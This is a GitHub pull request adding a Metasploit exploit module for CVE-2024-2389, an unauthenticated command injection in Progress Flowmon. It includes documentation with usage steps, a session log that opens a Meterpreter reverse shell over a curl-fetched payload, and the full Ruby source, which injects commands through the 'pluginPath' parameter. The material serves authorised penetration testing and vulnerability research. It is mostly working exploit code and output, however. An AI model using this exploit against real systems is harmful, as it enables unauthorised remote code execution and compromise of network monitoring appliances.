-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add module for Flowmon cmd injection CVE-2024-2389 #19150
Merged
3 commits merged into
rapid7:master
from
DaveYesland:module/flowmon_cmd_injection_cve-2024-2389
May 29, 2024
Merged
Changes from all commits
Commits
File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
91 changes: 91 additions & 0 deletions
91
documentation/modules/exploit/linux/http/progress_flowmon_unauth_cmd_injection.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,91 @@ | ||
## Vulnerable Application | ||
CVE-2024-2389: Progress Flowmon Unauthenticated Command Injection | ||
|
||
For more details on the vulnerability: | ||
https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/ | ||
|
||
https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability | ||
|
||
This application is available in cloud marketplaces: | ||
- https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon | ||
- https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka | ||
- https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud | ||
|
||
|
||
## Verification Steps | ||
1. Install the application | ||
1. Start msfconsole | ||
1. Do: `use exploits/linux/http/progress_flowmon_unauth_cmd_injection` | ||
1. Do: `set RHOSTS <target flowmon>` | ||
1. Do: `set RPORT <port flowmon is running on>` | ||
1. Do: `set LHOST <your host IP>` | ||
1. Do: `run` | ||
1. You should get a shell as the `flowmon` user. | ||
1. (Optional) use the module `exploit/linux/local/progress_flowmon_sudo_privesc_2024` to gain root privileges. | ||
|
||
## Scenarios | ||
|
||
### Progress Flowmon 12.2 | ||
|
||
``` | ||
msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > show options | ||
|
||
Module options (exploit/linux/http/progress_flowmon_unauth_cmd_injection): | ||
|
||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
PRIVESC true yes Automatically try privesc to add sudo entry | ||
Proxies no A proxy chain of format type:host:port[,type:host:port][...] | ||
RHOSTS 172.174.209.101 yes The target host(s), see https://docs.metasploit.com/docs/using-meta sploit/basics/using-metasploit.html | ||
RPORT 443 yes The target port (TCP) | ||
SSL true no Negotiate SSL/TLS for outgoing connections | ||
TARGETURI / yes The URI path to Flowmon | ||
VHOST no HTTP server virtual host | ||
|
||
|
||
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): | ||
|
||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP | ||
, WGET) | ||
FETCH_DELETE false yes Attempt to delete the binary after execution | ||
FETCH_FILENAME TkHAXYbQwlH no Name to use on remote system when storing payload; cannot contain spaces or slashes | ||
FETCH_SRVHOST no Local IP to use for serving payload | ||
FETCH_SRVPORT 8080 yes Local port to use for serving payload | ||
FETCH_URIPATH no Local URI to use for serving payload | ||
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain space | ||
s | ||
LHOST 138.111.211.11 yes The listen address (an interface may be specified) | ||
LPORT 4444 yes The listen port | ||
|
||
|
||
Exploit target: | ||
|
||
Id Name | ||
-- ---- | ||
0 Automatic | ||
|
||
|
||
|
||
View the full module info with the info, or info -d command. | ||
|
||
msf6 exploit(linux/http/flowmon_unauth_cmd_injection) > run | ||
|
||
[*] Started reverse TCP handler on 138.111.211.11:4444 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] Checking if 172.174.209.101:443 can be exploited! | ||
[*] Detected version: 12.02.06 | ||
[+] The target is vulnerable. Version 12.02.06 is vulnerable. | ||
[*] Attempting to execute payload... | ||
[*] Meterpreter session 1 opened (138.111.211.11:4444 -> 172.174.209.101:48856) at 2024-05-01 15:22:24 +0000 | ||
|
||
meterpreter > sysinfo | ||
Computer : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net | ||
OS : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64) | ||
Architecture : x64 | ||
BuildTuple : x86_64-linux-musl | ||
Meterpreter : x64/linux | ||
meterpreter > getuid | ||
Server username: flowmon | ||
``` |
94 changes: 94 additions & 0 deletions
94
modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,94 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
prepend Msf::Exploit::Remote::AutoCheck | ||
|
||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'Flowmon Unauthenticated Command Injection', | ||
'Description' => %q{ | ||
This module exploits an unauthenticated command injection vulnerability in Progress Flowmon | ||
versions before v12.03.02. | ||
}, | ||
'Author' => [ | ||
'Dave Yesland with Rhino Security Labs', | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => [ | ||
['CVE', '2024-2389'], | ||
['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'], | ||
['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability'] | ||
], | ||
'DisclosureDate' => '2024-04-23', | ||
'Notes' => { | ||
'Stability' => [ CRASH_SAFE ], | ||
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK], | ||
'Reliability' => [ REPEATABLE_SESSION ] | ||
}, | ||
'Platform' => ['unix', 'linux'], | ||
'Arch' => [ARCH_CMD], | ||
'Targets' => [['Automatic', {}]], | ||
'Privileged' => false, | ||
'DefaultOptions' => { | ||
'SSL' => true, | ||
'RPORT' => 443 | ||
} | ||
) | ||
) | ||
|
||
register_options([ | ||
OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/']) | ||
]) | ||
end | ||
|
||
def execute_command(cmd) | ||
send_request_cgi( | ||
'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'), | ||
'method' => 'GET', | ||
'vars_get' => { | ||
'file' => rand_text_alphanumeric(8), | ||
'lang' => rand_text_alphanumeric(8), | ||
'pluginPath' => "$(#{cmd})" | ||
} | ||
) | ||
end | ||
|
||
def exploit | ||
print_status('Attempting to execute payload...') | ||
execute_command(payload.encoded) | ||
end | ||
|
||
def check | ||
print_status("Checking if #{peer} can be exploited!") | ||
|
||
uri = normalize_uri(target_uri.path, 'homepage/auth/login') | ||
res = send_request_cgi( | ||
'uri' => uri, | ||
'method' => 'GET' | ||
) | ||
|
||
return CheckCode::Unknown('Connection failed') unless res | ||
return CheckCode::Safe('Target does not appear to be running Progress Flowmon') unless res.code == 200 && res.get_html_document.xpath('//title').text == 'Flowmon Web Interface' | ||
|
||
# Use a regular expression to extract the version number from the response | ||
version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)}) | ||
|
||
return CheckCode::Unknown('Unable to determine the version from the favicon link.') unless version && version[1] | ||
|
||
print_status("Detected version: #{version[1]}") | ||
|
||
if Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02') | ||
CheckCode::Vulnerable("Version #{version[1]} is vulnerable.") | ||
else | ||
CheckCode::Safe("Version #{version[1]} is not vulnerable.") | ||
end | ||
end | ||
end |
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Not a blocker: As a sanity question; is fingerprinting on
homepage/auth/login
and havingfav.ico?v=....
enough to uniquely identify the application as flowmon - or are there other checks we can add to have a more rigorous checkThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I've added a check to ensure the following html appears on the login page: